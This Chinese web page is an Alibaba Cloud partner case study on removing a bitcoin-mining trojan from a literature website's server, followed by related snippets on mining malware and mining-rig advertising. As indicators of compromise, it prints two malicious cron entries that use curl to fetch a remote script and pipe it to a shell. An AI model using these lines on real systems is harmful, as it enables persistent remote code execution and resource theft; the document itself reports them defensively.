资源消耗异常,竟是因为比特币挖矿木马

上周末起,大规模网络勒索袭击迅速波及全球百余国家和地区,病毒锁死用户数据和电脑文件,要用户支付价值300-
600美元的比特币赎金,成为刷屏级新闻。

比特币是一种网络虚拟货币,主要基于一套密码编码、通过复杂算法产生,任何人都可以下载运行比特币客户端参与制造比特币,这个过程也被形象地称为“挖矿”。而比特币“挖矿木马”,就是由黑客通过木马控制大量肉鸡电脑,为其制造比特币的恶意程序。

                                   警方缴获的比特币“挖矿机”

阿里云服务的客户中,就有中过招的。
北京新华先锋出版科技有限公司是一家专业从事图书策划、代理出版和营销推广的现代化综合性文化产业机构,其旗下子公司北京酷读文化有限公司,负责运营网络文学网站——酷读网,签有国内知名的网络作家,颇具影响力。
在2016年11月份,网站开始出现CPU、内存资源消耗异常,网站响应速度变慢,而用户访问量没有明显变化。技术团队几经排查处理,仍不能消除故障。新华先锋希望找到专业运维人员,一来快速解决问题,恢复网站正常运营,二来长期为网站保驾护航,保障系统稳定,自身集中精力拓展业务。

多方考察,选择了阿里云生态服务合作伙伴博伟来提供服务保障。通过技术诊断,发现网站遭到了“比特币挖矿木马”的入侵。有些木马病毒的高级版本,可以篡改Linux的基础命令,技术人员很难用一般的方法找到木马进程。技术人员需要结合运维经验、网上的资料、用户故障时间点和系统log分析等综合手段才能定位问题。

新华先锋中的木马就是如此。黑客利用系统漏洞,通过web脚本植入该木马,盗用服务器资源进行比特币开采计算。通过下载并分析该木马脚本文件,博伟技术人员发现该木马修改了系统登录认证配置、计划任务、创建采矿进程进行数据接收和处理,同时伪造系统服务,充当守护进程。
l 被篡改的计划任务:
/10 * curl -fsSL http://www.haveabitchin.com/pm.sh?1116 | sh

/1 * root curl -fs http://101.55.126.66:8990/pm.sh | bash

l 木马文件:

l 木马守护进程:

l 被篡改的SSH配置:

博伟技术人员指导新华先锋完成数据备份,清理了木马进程、守护进程,恢复被篡改的配置文件和计划任务等,在系统恢复正常后进行了一系列加固操作:缓存数据库Redis、IP绑定/密码验证/更换端口、ROOT登录限制/密码修改、Mysql、FTP、SSH端口更换、IPtable访问控制,阿里云ECS实例的安全组IP/端口限制/快照备份。

好在该木马只是利用服务器资源进行计算,并没有盗用或毁坏用户数据,由于及时查杀木马修复漏洞,避免了用户资料泄露和加密敲诈勒索等更严重的后果。

经过此次故障处理及技术人员的日常巡检,现在用户系统运行平稳。博伟也一直在给新华先锋提供7*24小时的运维保障,让新华先锋得以专注自己的业务,在文化出版领域一展拳脚。

想要更多了解生态合作伙伴提供的服务内容,
欢迎进入阿里云官网-支持-区域服务查看!链接:https://www.aliyun.com/support/quyu

时间: 2024-09-22 09:38:34

资源消耗异常,竟是因为比特币挖矿木马的相关文章

如何防范比特币挖矿木马

  现在比特币的价格涨得很高,所以现在有黑客专门制造挖矿木马来诱导网友,从而达到控制电脑上的显卡来挖掘比特币.为什么木马要控制电脑中的显卡呢?因为显卡挖掘虚拟货币比特币的效率远比 CPU 要高.如果你是一位 3D 游戏玩家,正好中了比特币挖矿木马,就会发现在玩游戏时会非常卡顿.下面介绍一些简单的预防方法. 工具/原料防病毒软件 方法一.安装杀病毒软件更新病毒库在电脑上安装反病毒软件,及时更新最新的病毒库文件.打开反病毒软件,点击软件上的立即升级. 当更新完成后,可能需要我们重新启动来生效. 方法

如何预防比特币挖矿木马

比特币虽然是种虚拟货币,但却拥有高增长率,正是因为这样才引来黑客关注.如何预防比特币挖矿木马呢? 方法一.安装杀病毒软件更新病毒库在电脑上安装反病毒软件,及时更新最新的病毒库文件.打开反病毒软件,点击软件上的立即升级. 当更新完成后,可能需要我们重新启动来生效. 方法二.预防网上热门的视频文件现在的病毒木马都喜欢伪装成当下最流行的一些视频,比如热映电影<致青春>.<中国合伙人>等.所以当我们在上网观看或者下载视频时就需要留意当前下载的视频文件是否安全了.一般的视频文件应该都是上百兆

雅虎页面广告挂毒 欧洲百万电脑沦为比特币挖矿肉鸡

雅虎目前仍对事件原因保持沉默. 上周长达约4天的期间内,有200万左右欧洲用户在访问雅虎主页时,不慎点击主页上附带病毒的广告并导致搭载Windows系统的电脑受到病毒感染. 这些病毒中有一部分会在用户不知情的情况下,攻击系统中的Java程序漏洞,从而大量利用电脑资源进行比特币"挖矿"活动.雅虎目前尚未公布大约有多少用户受到影响,同时也没有提出相应的对策,如此不够完善的响应遭到各界诸多批评. 在相关声明中,雅虎表示,"从12月31日至1月3日期间,雅虎欧洲部的网站上不慎上架了数

一探中国的比特币挖矿工厂

The Coinsman报道了 位于中国东北农村的一家比特币挖矿工厂.作者称,工厂给人的第一印象是噪声,就像一群愤怒的蜜蜂在远处发出嗡嗡的声音,越靠近工厂声音越响,进入厂内更是 轰鸣不已.工厂有数以万计的ASIC芯片在挖矿,数十个大型工业级风扇充当了冷却设备,将矿机的工作温度保持在40°C左右.当矿机无用或者不再合算时, 工作人员会拆下芯片的供电单元,用于其它地方.这座工厂包含了约2500台矿机,每台算力为 230 Gh/s,每月电费超过40万元.工作人员称,他们在不忙的时候会看电影和玩游戏,其

如何快速生成底资源消耗委托类

问题描述 应为设计需要,在某个执行过程中不能保留委托类对象,需要不停的重复生成大量的委托对象.委托对象实际上是一个类,一个委托对应一个函数,这相当与在每个函数上对应一个类.委托类里面的_target字段指象调用委托的对象,而_methodPtr字段是一个int数值,是原数据表中指识函数的哪个数值,用来标识回调用方法.我现在有个疑问就是,一个类中的某个函数在原数据表中的标识数值是否在不同的对象中不变.如果是这样的话,那么只保留一个类引用,一个函数的标识数值,是不是就可以找到回调函数.如果在传入参数

ASICME Avalon比特币挖矿机将首次公开亮相

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 ASICME团队研发的基于Avalon芯片的阿瓦隆比特币矿机已经完成所有功能调试,将于6月29日在北京首次正式亮相. 在此前的6月19日,ASICME自研的"网络控制接口板, FPGA主控板" + "AVALON运算板"实现首次成功运行.ASICME Avalon全新自研的比特币挖矿机昨天已经完成所有调

ASICME Avalon比特币挖矿机正式亮相 受热捧

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 比特币挖矿机设备服务供应商商ASICME自行研制的Avalon比特币挖矿机6月29日下午在北京微软大厦举行的比特币沙龙上首次公开亮相,受到在场人员的热烈关注. ASICME本次发布的比特币挖矿机是基于Avalon ASIC芯片研制而成, 最高额定算力可达90,240 MH/s,是目前市面上算力最强的专业矿机. ASICME系列挖矿机无需电脑,

ASICME开启比特币挖矿机平民时代

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 如果在听到别人提及"挖矿机",你第一个想到的是"比特币"的时候,那说明你离互联网真的很近.比特币(英文名为:Bitcoin),这个开源P2P软件产生的电子货币,在接连爆出"美国一对新人用比特币度蜜月"."电商网站支持比特币进行支付"等一系列消息后,很多人开始对这个

ASICME推出比特币挖矿算力租赁服务

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 全球领先的比特币挖矿机设备供应商和应用开发商ASICME.com日前宣布,正式推出为期一年的算力租赁服务,用户可以通过人民币或比特币进行支付购买. 据了解,ASICME.com推出的一年期算力租赁服务,用户购买后可以在约定日期开始享受租赁的算力所形成的100%收益,无需支付任何其他费用,也无需承担矿机购买.矿机托管.矿机维护.矿池佣金等一切的